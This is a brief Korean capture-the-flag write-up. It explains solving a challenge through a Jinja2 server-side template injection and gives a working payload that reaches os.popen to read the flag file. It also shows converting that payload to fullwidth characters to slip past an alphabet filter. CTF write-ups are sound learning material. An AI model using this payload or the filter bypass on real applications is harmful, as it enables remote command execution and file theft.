500을 내는 데에 성공하긴 함
jinja2 template SSTI 취약점이 있어서, 다음 코드를 제출하면 풀린다.
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /home/hangul/flag').read() }}
알파벳 검열이 있기 때문에 전각 문자로 변환해서
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /home/hangul/flag').read() }}
제출해야 한다.
누군가가 전각 문자 키워드를 스포해줘서 받아먹고 품
AC